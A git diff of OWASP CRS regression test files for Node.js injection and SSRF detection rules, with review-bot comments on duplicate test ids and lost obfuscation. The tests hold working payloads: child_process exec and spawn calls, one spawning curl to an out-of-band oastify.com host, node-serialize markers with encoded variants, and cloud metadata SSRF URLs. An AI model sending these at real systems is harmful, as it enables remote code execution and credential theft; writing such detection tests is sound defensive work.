- version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process." + version: HTTP/1.0 + output: + no_log_contains: id "934100" + - test_id: 17 desc: '"console" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console." 
+ version: HTTP/1.0 + output: + no_log_contains: id "934100" + - test_id: 18 desc: ssti test 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 19 desc: ssti test 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 20 desc: ssti test 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - 
uri: "/get?foo=process%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5Breq.query.a" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 21 desc: ssti test 4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require%5Breq.query.a" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 22 desc: ssti test 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5BmainModule" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5BmainModule" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 23 desc: require child_process 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /get?foo=require("child_process").exec('whoami') - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /get?foo=require("child_process").exec('whoami') + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 24 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - process.env - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + process.env + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "934100" + - test_id: 25 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "934100" + - test_id: 26 desc: "5ZLKNU33" stages: - - stage: - input: + - input: dest_addr: 127.0.0.1 headers: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
@@ -426,89 +399,116 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" - - test_title: 934100-27 + log_contains: id "934100" + - test_id: 25 + desc: "5ZLKNU33" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: /post + output: + log_contains: id "934100" + - test_id: 26 + desc: "5ZLKNU33" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: /post + output: + log_contains: id "934100" + - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$ND_FUNC$$_function()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-28 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$ND_FUNC$$_function()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-29 + - input: + dest_addr: 
127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-30 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-31 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 29cfc424f..f49e6353d 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml 
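Review bot: The two entries added at the top of this hunk reuse `test_id: 25` and `test_id: 26`, which the first hunk of this file already assigns to the "5ZLKNU33" POST tests, so the rewritten file carries four tests for two ids. If the runner derives test names from `rule_id` plus `test_id`, the pairs will collide and one of each pair is likely to be silently skipped or overwritten; either drop the two new entries (both send `console.info(1)` to `/post`, which test 25 already covers) or renumber them and shift 27–31 accordingly. The added entries also omit the `version:` key that every other stage in this file sets, which may be harmless if the runner has a default but is inconsistent with the rest of the file.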
@@ -1,172 +1,161 @@ --- meta: author: "rekter0, azurit" - enabled: true - name: "934101.yaml" description: "Tests for rule 934101" +rule_id: 934101 tests: - - test_title: 934101-1 + - test_id: 1 desc: additional node ssti tests 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 2 desc: additional node ssti tests 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" + 
version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 3 desc: additional node ssti tests 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 4 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require(\"child_process\").exec('whoami')" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require(\"child_process\").exec('whoami')" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 5 desc: require child_process spawn stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 6 desc: "Detect example payload require(... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 7 desc: "Detect example payload require(... 
submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 9 desc: "Detect example payload require(... 
submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" + - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934101" 
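Review bot: Tests 7 and 10 lose the obfuscation their descriptions promise: the new Cookie for test 7 is `test_cookie=require("child_process").exec('whoami')`, identical to test 6, and the new Cookie for test 10 is the plain Base64 value of test 8, whereas the removed lines carried `\u0072\u0065quire(...)` and `\u0063\u006dVxdWlyZ...`. As written, 7 and 10 merely duplicate 6 and 8 and no longer exercise the rule's handling of JavaScript escape sequences, so a regression there would pass unnoticed; restore the removed values, `Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami')` and `Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg==` (as plain scalars the backslashes stay literal, which is what the test wants). The matching cookie tests in 934100.yaml (ids 28 and 31) keep their escape sequences in this same diff, which suggests the drop here was unintentional.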
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 25fc7eee7..7dc54e0c6 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml 
@@ -1,151 +1,142 @@
 ---
 meta:
 author: "fzipitria, azurit"
- enabled: true
- name: "934110.yaml"
 description: "Test for vanilla SSRF in PL1"
+rule_id: 934110
 tests:
- - test_title: 934110-1
+ - test_id: 1
 desc: SSRF - check google cloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934110"
+ - test_id: 2
 desc: SSRF - check digitalcloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934110"
+ - test_id: 3
 desc: SSRF - check packetcloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-4
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934110"
+ - test_id: 4
 desc: SSRF - check openstack url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-5
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934110"
+ - test_id: 5
 desc: SSRF - check oracle cloud url
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F"
- version: "HTTP/1.1"
- output:
- log_contains: id "934110"
- - test_title: 934110-6
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "934110"
+ - test_id: 6
 desc: SSRF - negative test aws
